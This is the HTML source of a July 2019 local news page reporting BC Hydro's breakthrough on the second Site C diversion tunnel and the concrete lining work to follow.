<div class="menu-website-menu-container"><ul id="menu-website-menu-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-122999"><a href="https://www.energeticcity.ca/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-123000"><a href="https://www.energeticcity.ca/news/">News</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-134529"><a href="https://www.energeticcity.ca/2018-municipal-election/">2018 Municipal Election</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-133514"><a href="https://www.energeticcity.ca/cat-energy/">Energy News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-133515"><a href="https://www.energeticcity.ca/site-c/">Site C</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-128306"><a href="https://www.energeticcity.ca/forest-fires/">Forest Fires</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-134079"><a href="https://www.energeticcity.ca/news/landslide/">Landslide</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-123001"><a href="https://www.energeticcity.ca/sports/">Sports</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-123003"><a href="https://www.energeticcity.ca/townwall-events/">Events</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-123004"><a href="https://regionalhelpwanted.com/fort-st-john-british-columbia-jobs/">Jobs</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-130138"><a href="https://www.energeticcity.ca/get-moose-fm-energeticcity-ca-working-for-you/">Looking for Employees?</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-123005"><a href="http://www.moosefm.ca">Moose FM</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-123006"><a href="https://www.landmarkcinemas.com/showtimes/fort-st-john">Movies</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-131428"><a href="http://fortstjohnadvertising.ca/">Advertise</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-123008"><a href="https://www.energeticcity.ca/news-tip/">News Tip</a></li>
</ul></div></div>
<div class="header-search-wrap">
<div class="td-search-btns-wrap">
<a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
<a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
</div>
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="https://www.energeticcity.ca/">
<div role="search" class="td-head-form-search-wrap">
<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
</div>
</form>
<div id="td-aj-search"></div>
</div>
</div>
</div>
</div>
</div>
</div> <div class="td-main-content-wrap td-container-wrap">
<div class="tdc-content-wrap">
<article id="post-132213" class="post-132213 tdb_templates type-tdb_templates status-publish post" itemscope itemtype="https://schema.org/Article">
<div id="td_uid_1_5d28fc08c0a5f" class="tdc-row"><div class="vc_row td_uid_2_5d28fc08c0ad6_rand td-ss-row wpb_row td-pb-row">
<style scoped>

/* custom css */
.td_uid_2_5d28fc08c0ad6_rand {
                    min-height: 0;
                }
/* inline tdc_css att */

.td_uid_2_5d28fc08c0ad6_rand{
margin-top:48px !important;
}

.td_uid_2_5d28fc08c0ad6_rand .td_block_wrap{ text-align:left }

</style><div class="vc_column td_uid_3_5d28fc08c0df5_rand  wpb_column vc_column_container tdc-column td-pb-span8"><div class="wpb_wrapper"><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_4_5d28fc08c0ffe_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_4_5d28fc08c0ffe_rand { 
display:none !important;
} }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_4_5d28fc08c0ffe_rand{
display:none !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_4_5d28fc08c0ffe_rand{
display:none !important;
}
}

</style><div class="td-fix-index"><center>
<div id='div-gpt-ad-1548958543195-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958543195-0'); });
</script>
</div></center></div></div><div class="td_block_wrap tdb_single_featured_image td_uid_5_5d28fc08c1399_rand tdb-content-horiz-left td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_5_5d28fc08c1399">
<style>

/* inline tdc_css att */

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_5_5d28fc08c1399_rand{
margin-bottom:15px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.td_uid_5_5d28fc08c1399_rand{
margin-right:-20px !important;
margin-bottom:15px !important;
margin-left:-20px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_5_5d28fc08c1399_rand .tdb-caption-text {
                        margin: 6px 0 0;
                    }
</style><div class="tdb-block-inner td-fix-index">
<a href="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&ssl=1" data-caption="">
<img width="696" height="387" class="entry-thumb td-modal-image" src="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=696%2C387&ssl=1" srcset="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?w=1137&ssl=1 1137w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=150%2C84&ssl=1 150w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=300%2C167&ssl=1 300w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=1024%2C570&ssl=1 1024w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=696%2C387&ssl=1 696w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=1068%2C595&ssl=1 1068w, https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?resize=754%2C420&ssl=1 754w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="BC Hydro Tunnel Two" />
</a></div></div><div class="td_block_wrap tdb_breadcrumbs td_uid_6_5d28fc08c42ef_rand td-pb-border-top td_block_template_1 tdb-breadcrumbs " data-td-block-uid="td_uid_6_5d28fc08c42ef">
<style>

/* inline tdc_css att */

.td_uid_6_5d28fc08c42ef_rand{
margin-bottom:20px !important;
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_6_5d28fc08c42ef_rand{
margin-bottom:10px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.td_uid_6_5d28fc08c42ef_rand{
margin-bottom:10px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_6_5d28fc08c42ef_rand .tdb-bread-sep {
                    font-size: 8px;
                }
                
                .td_uid_6_5d28fc08c42ef_rand .tdb-bread-sep {
                    margin: 0 5px;
                }
                 
				.td_uid_6_5d28fc08c42ef_rand,
				.td_uid_6_5d28fc08c42ef_rand a {
					color: #222222;
				}
                
				.td-theme-wrap .td_uid_6_5d28fc08c42ef_rand {
					text-align: left;
				}
</style><div class="tdb-block-inner td-fix-index"><span><a title="" class="tdb-entry-crumb" href="https://www.energeticcity.ca/">Home</a></span> <i class="td-icon-slashh tdb-bread-sep"></i> <span><a title="View all posts in News" class="tdb-entry-crumb" href="https://www.energeticcity.ca/news/">News</a></span> <i class="td-icon-slashh tdb-bread-sep tdb-bred-no-url-last"></i> <span class="tdb-bred-no-url-last">BC Hydro makes breakthrough on second diversion tunnel</span></div></div><script type="application/ld+json">
                        {
                            "@context": "http://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "https://www.energeticcity.ca/",
                                "name": "Home"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://www.energeticcity.ca/news/",
                                "name": "News"
                            }
                        },{
                            "@type": "ListItem",
                            "position": 3,
                                "item": {
                                "@type": "WebPage",
                                "@id": "",
                                "name": "BC Hydro makes breakthrough on second diversion tunnel"                                
                            }
                        }    ]
                        }
                       </script><div class="td_block_wrap tdb_single_categories td_uid_7_5d28fc08c4b6f_rand td-pb-border-top td_block_template_1 " data-td-block-uid="td_uid_7_5d28fc08c4b6f">
<style>

/* inline tdc_css att */

.td_uid_7_5d28fc08c4b6f_rand{
margin-bottom:20px !important;
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_7_5d28fc08c4b6f_rand{
margin-bottom:10px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.td_uid_7_5d28fc08c4b6f_rand{
margin-bottom:10px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_7_5d28fc08c4b6f_rand .tdb-entry-category {
					padding: 8px 14px 9px 14px;
				}
                
				.td_uid_7_5d28fc08c4b6f_rand .tdb-entry-category {
					margin: 0 15px 0 0;
				}
                
				.td_uid_7_5d28fc08c4b6f_rand .tdb-cat-bg {
					border-width: 1px;
				}
				
				.td_uid_7_5d28fc08c4b6f_rand .tdb-cat-sep {
					font-size: 14px;
				}
                
				.td_uid_7_5d28fc08c4b6f_rand .tdb-cat-text {
					margin-right: 10px;
				}
				
				.td-theme-wrap .td_uid_7_5d28fc08c4b6f_rand {
					text-align: left;
				}
				
				.td_uid_7_5d28fc08c4b6f_rand .tdb-entry-category {
					text-transform:uppercase !important;
				}
</style><div class="tdb-category td-fix-index"><a class="tdb-entry-category" href="https://www.energeticcity.ca/news/"><span class="tdb-cat-bg"></span>News</a></div></div><div class="td_block_wrap tdb_title td_uid_8_5d28fc08c5385_rand tdb-single-title td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_8_5d28fc08c5385">
<style>

/* inline tdc_css att */

.td_uid_8_5d28fc08c5385_rand{
margin-bottom:10px !important;
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_8_5d28fc08c5385_rand{
margin-bottom:7px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.td_uid_8_5d28fc08c5385_rand{
margin-bottom:5px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_8_5d28fc08c5385_rand .tdb-title-text {
					color: #222222;
				}
				
				.td_uid_8_5d28fc08c5385_rand .tdb-title-line:after  {
					height: 2px;
				}
				
				.td_uid_8_5d28fc08c5385_rand .tdb-title-line  {
					height: 50px;
				}
				
				.td_uid_8_5d28fc08c5385_rand .tdb-title-line:after   {
					bottom: 40%;
				}
				
				.td-theme-wrap .td_uid_8_5d28fc08c5385_rand {
					text-align: left;
				}
				.td_uid_8_5d28fc08c5385_rand .tdb-first-letter {
					left: -0.36em;
					right: auto;
				}
				
				.td_uid_8_5d28fc08c5385_rand .tdb-title-text {
					font-family:Montserrat !important;font-size:46px !important;line-height:50px !important;font-weight:700 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.td_uid_8_5d28fc08c5385_rand .tdb-title-text {
					font-family:Montserrat !important;font-size:40px !important;line-height:50px !important;font-weight:700 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.td_uid_8_5d28fc08c5385_rand .tdb-title-text {
					font-family:Montserrat !important;font-size:32px !important;line-height:36px !important;font-weight:700 !important;
				}
}

/* phone */
@media (max-width: 767px){
.td_uid_8_5d28fc08c5385_rand .tdb-title-text {
					font-family:Montserrat !important;font-size:26px !important;line-height:34px !important;font-weight:700 !important;
				}
}
</style><div class="tdb-block-inner td-fix-index"><h1 class="tdb-title-text">BC Hydro makes breakthrough on second diversion tunnel</h1><div></div><div class="tdb-title-line"></div></div></div><div class="td_block_wrap tdb_single_author td_uid_10_5d28fc08c5c50_rand td-pb-border-top td_block_template_1 tdb-post-meta" data-td-block-uid="td_uid_10_5d28fc08c5c50">
<style>

/* inline tdc_css att */

.td_uid_10_5d28fc08c5c50_rand{
margin-right:15px !important;
margin-bottom:0px !important;
}

/* phone */
@media (max-width: 767px)
{
.td_uid_10_5d28fc08c5c50_rand{
margin-bottom:8px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_10_5d28fc08c5c50_rand {
                    display: inline-block;
                }

                
                .td_uid_10_5d28fc08c5c50_rand .avatar {
                    width: 30px;
                    height: 30px;
                }
                
                .td_uid_10_5d28fc08c5c50_rand .avatar {
                    margin-right: 6px;
                }
                
                .td_uid_10_5d28fc08c5c50_rand .avatar {
                    border-radius: 50%;
                }
                

                
				.td_uid_10_5d28fc08c5c50_rand .tdb-author-name {
					color: #000;
				}
                
				.td_uid_10_5d28fc08c5c50_rand .tdb-author-name {
					font-size:12px !important;text-transform:uppercase !important;
				}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-author-photo" href="https://www.energeticcity.ca/author/tteves/"><img src="https://i1.wp.com/www.energeticcity.ca/wp-content/wphb-cache/gravatar/2e3/2e3f3146babeaa0599c8f3306700b9e0x96.jpg?resize=96%2C96&#038;ssl=1" width="96" height="96" alt="Avatar" class="avatar avatar-96 wp-user-avatar wp-user-avatar-96 photo avatar-default" data-recalc-dims="1" /></a><span class="tdb-author-by"></span> <a class="tdb-author-name" href="https://www.energeticcity.ca/author/tteves/">Tracy Teves</a></div></div><div class="td_block_wrap tdb_single_date td_uid_11_5d28fc08c6382_rand td-pb-border-top td_block_template_1 tdb-post-meta" data-td-block-uid="td_uid_11_5d28fc08c6382">
<style>

/* inline tdc_css att */

.td_uid_11_5d28fc08c6382_rand{
margin-right:15px !important;
margin-bottom:2px !important;
}

/* phone */
@media (max-width: 767px)
{
.td_uid_11_5d28fc08c6382_rand{
margin-bottom:10px !important;
}
}

</style>
<style>
/* custom css */
.td_uid_11_5d28fc08c6382_rand {
                    display: inline-block;
                }
                
				.td_uid_11_5d28fc08c6382_rand {
					font-size:12px !important;font-weight:600 !important;text-transform:uppercase !important;
				}
</style><div class="tdb-block-inner td-fix-index"><time class="entry-date updated td-module-date" datetime="2019-07-12T12:53:21+00:00">July 12, 2019 12:53 pm</time></div></div> <div class="td_block_wrap tdb_single_post_share td_uid_12_5d28fc08c67f1_rand td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_12_5d28fc08c67f1">
<style>

/* inline tdc_css att */

.td_uid_12_5d28fc08c67f1_rand{
margin-top:0px !important;
margin-bottom:0px !important;
border-style:dotted !important;
border-color:#ffffff !important;
border-width:0 !important;
}

/* phone */
@media (max-width: 767px)
{
.td_uid_12_5d28fc08c67f1_rand{
margin-top:5px !important;
width:100% !important;
}
}

</style>
<style>
/* custom css */
.td_uid_12_5d28fc08c67f1_rand .td-post-sharing,
				.td_uid_12_5d28fc08c67f1_rand .tdb-share-classic {
					text-align: center;
				}
</style><div id="td_uid_12_5d28fc08c67f1" class="td-post-sharing td-ps-bg td-ps-notext td-ps-rounded td-post-sharing-style3 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F">
<div class="td-social-but-icon"><i class="td-icon-facebook"></i></div>
<div class="td-social-but-text">Facebook</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=BC+Hydro+makes+breakthrough+on+second+diversion+tunnel&url=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F&via=energeticcity">
<div class="td-social-but-icon"><i class="td-icon-twitter"></i></div>
<div class="td-social-but-text">Twitter</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" href="/cdn-cgi/l/email-protection#d4eba7a1b6beb1b7a0e99697f49cadb0a6bbf4b9b5bfb1a7f4b6a6b1b5bfa0bca6bba1b3bcf4bbbaf4a7b1b7bbbab0f4b0bda2b1a6a7bdbbbaf4a0a1babab1b8f2b6bbb0ade9bca0a0a4a7eefbfba3a3a3fab1bab1a6b3b1a0bdb7b7bda0adfab7b5fbe6e4e5edfbe4e3fbb6b7f9bcadb0a6bbf9b9b5bfb1a7f9b6a6b1b5bfa0bca6bba1b3bcf9bbbaf9a7b1b7bbbab0f9b0bda2b1a6a7bdbbbaf9a0a1babab1b8fb">
<div class="td-social-but-icon"><i class="td-icon-mail"></i></div>
<div class="td-social-but-text">Email</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/&amp;media=https://www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png&description=BC+Hydro+makes+breakthrough+on+second+diversion+tunnel">
<div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div>
<div class="td-social-but-text">Pinterest</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="whatsapp://send?text=BC Hydro makes breakthrough on second diversion tunnel %0A%0A https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/">
<div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div>
<div class="td-social-but-text">WhatsApp</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-googleplus" href="https://plus.google.com/share?url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/">
<div class="td-social-but-icon"><i class="td-icon-googleplus"></i></div>
<div class="td-social-but-text">Google+</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/&title=BC Hydro makes breakthrough on second diversion tunnel">
<div class="td-social-but-icon"><i class="td-icon-linkedin"></i></div>
<div class="td-social-but-text">Linkedin</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#">
<div class="td-social-but-icon"><i class="td-icon-print"></i></div>
<div class="td-social-but-text">Print</div>
</a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_uid_12_5d28fc08c67f1">
<div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
</a></div></div></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator td_uid_13_5d28fc08c742c_rand  td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.td_uid_13_5d28fc08c742c_rand{
margin-bottom:0px !important;
}

</style></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_14_5d28fc08c74f5_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_14_5d28fc08c74f5_rand { 
display:none !important;
} }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_14_5d28fc08c74f5_rand{
display:none !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_14_5d28fc08c74f5_rand{
display:none !important;
}
}

</style><div class="td-fix-index"><center>Advertisement</center>
<center>
<div id='div-gpt-ad-1546187469510-0' style='height:50px; width:320px;'>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1546187469510-0'); });
</script>
</div></center>
</div></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_15_5d28fc08c75dc_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_15_5d28fc08c75dc_rand { 
display:none !important;
} }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_15_5d28fc08c75dc_rand{
display:none !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_15_5d28fc08c75dc_rand{
display:none !important;
}
}

</style><div class="td-fix-index"><center>
<div id='div-gpt-ad-1548986864458-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548986864458-0'); });
</script>
</div></center></div></div><div class="td_block_wrap tdb_single_content td_uid_16_5d28fc08c78c0_rand td-pb-border-top td_block_template_1 td-post-content" data-td-block-uid="td_uid_16_5d28fc08c78c0">
<style>
/* custom css */
.td_uid_16_5d28fc08c78c0_rand,
                .td_uid_16_5d28fc08c78c0_rand p {
			        font-size:16px !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand h1 {
			        font-family:Montserrat !important;font-weight:700 !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand h2 {
			        font-family:Montserrat !important;font-weight:700 !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand h3 {
			        font-family:Montserrat !important;font-weight:700 !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand h4 {
			        font-family:Montserrat !important;font-weight:700 !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand blockquote p {
			        font-family:Montserrat !important;font-size:30px !important;font-weight:700 !important;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand blockquote p {
			        color: #222222;
		        }
				
				.td_uid_16_5d28fc08c78c0_rand .id_inline_ad_content-horiz-left .td-adspot-title,
				.td_uid_16_5d28fc08c78c0_rand .id_inline_ad_content-horiz-right .td-adspot-title {
			        color: #000000;
		        }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.td_uid_16_5d28fc08c78c0_rand,
                .td_uid_16_5d28fc08c78c0_rand p {
			        font-size:13px !important;
		        }
}
</style><div class="tdb-block-inner td-fix-index"><p style="font-weight: 400;">FORT ST. JOHN, B.C. &#8211; On Thursday, July 11th, 2019 BC Hydro reached another milestone on the Site C project with the breakthrough on the second diversion tunnel.</p>
<p style="font-weight: 400;">According to BC Hydro, the diversion tunnel two is about 780 metres long and will eventually be about 11 metres in diameter. The excavation of tunnel two began last summer.</p>
<p style="font-weight: 400;">Now that breakthrough has occurred on tunnel two, the tunnel lining process will start in the coming days shares David Conway, Community Relations Manager.</p>
<div class="td-a-ad id_inline_ad_content-horiz-center"><span class="td-adspot-title">- Advertisement -</span><script async src="https://cdn.ad.plus/player/adplus.js"></script>
<script>(function(){var i='xqDAi17KFwt-_YRJs1rqG5TNeMagwtSebOl_FmykABvqPzAfWBR0';document.write('</p>
<p>
</p>
<div id="'+i+'"></div>
<p>
</p>
<p>');(playerPro=window.playerPro||[]).push(i);})();</script></div><p style="font-weight: 400;">The tunnel lining process involves using a slip form where concrete is pumped through small openings located around the slip form, enabling it to cure in a perfect circle outside of the form.</p>
<p style="font-weight: 400;">The lining of both tunnels is expected to be complete in early 2020.</p>
<p>Site C Diversion Tunnel One, <a href="https://www.energeticcity.ca/2019/06/b-c-hydro-completes-drilling-on-first-site-c-diversion-tunnel/">CLICK HERE</a></p>
<p>Site C &#8211; Tunnel Lining;<a href="https://www.energeticcity.ca/2019/06/bc-hydro-starts-tunnel-lining-process-for-site-c-diversion-tunnels/"> CLICK HERE</a></p>
<p>&nbsp;</p>
<div id="wdca_ads_root"><div class="wdca_ad_item wdca_not_placed wdca_custom_ad ">
<div class="wdca_stars"></div>
<div class="wdca_ad_body_full">
<p><center></p>
<div id='div-gpt-ad-1548958409608-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958409608-0'); });
</script>
</div>
<p></center></p>
</div>
<p class="wdca_footer"></p></div><div class="wdca_ad_item wdca_not_placed wdca_custom_ad ">
<div class="wdca_stars"></div>
<div class="wdca_ad_body_full">
<p><center></p>
<div id='div-gpt-ad-1560950915044-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1560950915044-0'); });
</script>
</div>
<p></center></p>
</div>
<p class="wdca_footer"></p></div><div class="wdca_ad_item wdca_not_placed wdca_custom_ad ">
<div class="wdca_stars"></div>
<div class="wdca_ad_body_full">
<p><center></center></p>
<div id="div-gpt-ad-1560950915044-0" style="height: 250px; width: 300px;"><script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1560950915044-0'); });
</script></div>
</div>
<p class="wdca_footer"></p></div></div></div></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_17_5d28fc08cb333_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_17_5d28fc08cb333_rand { 
display:none !important;
} }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_17_5d28fc08cb333_rand{
display:none !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_17_5d28fc08cb333_rand{
display:none !important;
}
}

</style><div class="td-fix-index"><center>
<div id='div-gpt-ad-1548958573620-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958573620-0'); });
</script>
</div></center></div></div><div class="td_block_wrap td_block_text_with_title td_uid_18_5d28fc08cb6c2_rand td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_18_5d28fc08cb6c2">
<style>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_18_5d28fc08cb6c2_rand { 
display:none !important;
} }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_18_5d28fc08cb6c2_rand{
display:none !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_18_5d28fc08cb6c2_rand{
display:none !important;
}
}

</style><div class="td-block-title-wrap"><h4 class="block-title td-block-title"><span class="td-pulldown-size">get the latest news in your inbox</span></h4></div><div class="td_mod_wrap td-fix-index"><script>(function() {
	if (!window.mc4wp) {
		window.mc4wp = {
			listeners: [],
			forms    : {
				on: function (event, callback) {
					window.mc4wp.listeners.push({
						event   : event,
						callback: callback
					});
				}
			}
		}
	}
})();
</script><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-89505" method="post" data-id="89505" data-name="Energeticcity.ca Mailout"><div class="mc4wp-form-fields"><div class="newsletter-block">
<p>Sign up for the daily Energeticcity.ca email sponsored by the <a href="https://www.blackdiamondgroup.com/"> Black Diamond Group</a>. Get the latest news sent directly to your inbox.</p>
<p>
<label>Email address: </label>
<input type="email" name="EMAIL" placeholder="Your email address" required />
</p>
<p>
<input type="submit" value="Subscribe" />
</p>
</div>
</div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1562967048" /><input type="hidden" name="_mc4wp_form_id" value="89505" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form>
</div></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_19_5d28fc08ccdb4_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_19_5d28fc08ccdb4_rand { 
display:none !important;
} }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_19_5d28fc08ccdb4_rand{
display:none !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_19_5d28fc08ccdb4_rand{
display:none !important;
}
}

</style><div class="td-fix-index"><center>
<div id='div-gpt-ad-1548958590036-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958590036-0'); });
</script>
</div></center></div></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_20_5d28fc08ccecf_rand ">
<style scoped>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_20_5d28fc08ccecf_rand { 
display:none !important;
} }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_20_5d28fc08ccecf_rand{
display:none !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_20_5d28fc08ccecf_rand{
display:none !important;
}
}

</style><div class="td-fix-index"></div></div><div class="td-a-rec td-a-rec-id-custom_ad_4  td_uid_21_5d28fc08ccfd1_rand td_block_template_1">
<style>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.td_uid_21_5d28fc08ccfd1_rand{
display:none !important;
}
}

</style><center>
<div id='div-gpt-ad-1548958444786-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958444786-0'); });
</script>
